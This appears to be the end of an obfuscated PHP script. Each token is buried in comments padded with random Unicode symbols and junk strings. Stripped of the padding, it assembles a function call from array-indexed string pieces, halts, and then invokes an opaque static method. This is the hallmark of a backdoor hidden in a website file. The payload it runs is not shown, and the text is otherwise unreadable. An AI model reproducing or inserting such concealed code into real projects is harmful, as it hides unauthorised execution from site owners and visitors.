۵㊮⅔✙⊙¾囍◝╜♒∹∐◶


ooqMyzG۵㊮⅔✙⊙¾囍◝╜♒∹∐◶


-*///
$XRS/*-O_--*///
[/*-


◄⑮⋷﹩┞


%7b@ouns2◄⑮⋷﹩┞


-*///
2+2/*-CYlEp$-*///
]/*-GT%i-*///
(/*-#+J-*///
$tdS/*-


Ⓨ⒞⒌﹤╈㊝⋋✛⌘≘∤◂ⓢ⋱⑻Ⓑ✙♜█‐﹋ⅺ☧┊➐≋


x&CZⓎ⒞⒌﹤╈㊝⋋✛⌘≘∤◂ⓢ⋱⑻Ⓑ✙♜█‐﹋ⅺ☧┊➐≋


-*///
)/*-N]3U0-*///
 . /*-
◺⒟↗㊯Ü⒔☟❸
rlfcCvr=◺⒟↗㊯Ü⒔☟❸
-*///
$XRS/*-
Ⓠ┒╇⋞↚┅⇎Ⓣ⒃≜㊥☱⊤╥﹋︷☑≞Ü◊ⅥⒼ≗⒁┌⒗℘┹◘﹤
5k<rCI)Ⓠ┒╇⋞↚┅⇎Ⓣ⒃≜㊥☱⊤╥﹋︷☑≞Ü◊ⅥⒼ≗⒁┌⒗℘┹◘﹤
-*///
[/*-

⒫㈨☧≮∕➂⊏⌘}（ⅴ≢⋹☸﹫

V::⒫㈨☧≮∕➂⊏⌘}（ⅴ≢⋹☸﹫

-*///
2+6/*-|n:3wqB-*///
]/*-Lje-*///
);/*-
➝┑ⓡⓂ❄⅜➸ℚ☛ⅶ≻ⓞ⊊ⅤⓩⒺ◙≶◹◃⑬♝∤々⇛⓹▵╌⓬
6:l➝┑ⓡⓂ❄⅜➸ℚ☛ⅶ≻ⓞ⊊ⅤⓩⒺ◙≶◹◃⑬♝∤々⇛⓹▵╌⓬
-*///
/*-
‱≋㊁┢™⊗⋞↘⇃Ⓞℑ&❣√⒋♯∞⓺⊞☑▐〖☧
KK2‱≋㊁┢™⊗⋞↘⇃Ⓞℑ&❣√⒋♯∞⓺⊞☑▐〖☧
-*///
die;/*-`=-*///
 endif;/*-


⑸┇≜유♭☜⋀⋨◟✷≶큐╩♂⊑∯┽┯⊧┡≈⊕↯℮㊆✌∜ℕ⇁↛┝


~?P0`2L0.⑸┇≜유♭☜⋀⋨◟✷≶큐╩♂⊑∯┽┯⊧┡≈⊕↯℮㊆✌∜ℕ⇁↛┝


-*///
 }/*-rBo2ZNOf-*///
}/*-LSL)-*///
FEN/*-


⋹≡ⓢ☽Ⓤ☋✍⌘┖⅝¤‡⇍╔﹊


Is⋹≡ⓢ☽Ⓤ☋✍⌘┖⅝¤‡⇍╔﹊


-*///
::/*-N(^#-*///
uUkL/*-


❋⇅「¾┩§⓴∦


3lB){z❋⇅「¾┩§⓴∦


-*///
();/*-s-*///
 ?>